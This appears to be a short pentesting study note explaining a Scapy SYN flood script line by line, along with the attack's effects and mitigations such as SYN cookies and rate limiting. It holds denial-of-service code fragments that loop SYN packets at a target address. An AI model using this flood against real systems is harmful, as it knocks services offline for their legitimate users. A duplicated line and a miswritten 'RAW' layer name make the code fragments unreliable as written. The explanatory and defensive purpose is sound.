A SYN flood attack exploits the TCP handshake by sending a succession of SYN requests to a target’s system. Each request initializes a connection that the target system must acknowledge, thus consuming resources.
- Understanding the Script:
- ip = IP(“192.168.50.2”): Sets the destination IP address to 192.168.50.2. * tcp = TCP(sport=RandShort(), dport=80, flags=“S”):
- Creates a TCP packet with a random source port, destination port 80, and the SYN flag set.
- raw = RAW(b”X”*1024): Adds 1024 bytes of data to the packet.
- p = ip/tcp/raw: Combines the IP, TCP, and RAW layers into a single packet.
- send(p, loop=1, verbose=0): Sends the packet in an infinite loop without verbose output.
- ip = IP(“192.168.50.2”): Sets the destination IP address to 192.168.50.2. * tcp = TCP(sport=RandShort(), dport=80, flags=“S”):
- Purpose of SYN Flood:
- Resource Exhaustion: By sending numerous SYN requests, the target’s connection table fills up, preventing legitimate connections.
- Denial of Service: The target system becomes overwhelmed and unable to process further requests, effectively causing a denial of service.
- Detection and Mitigation:
- Rate Limiting: Implement rate limiting on SYN packets.
- SYN Cookies: Use SYN cookies to handle the connection requests without allocating resources immediately.
- Firewalls and IDS: Deploy firewalls and Intrusion Detection Systems (IDS) to detect and mitigate SYN flood attacks.
- References from Pentesting Literature:
- SYN flood attacks are a classic example of a Denial of Service attack and are commonly discussed in penetration testing guides and HTB write-ups for understanding network-based attacks. #attacks attack dos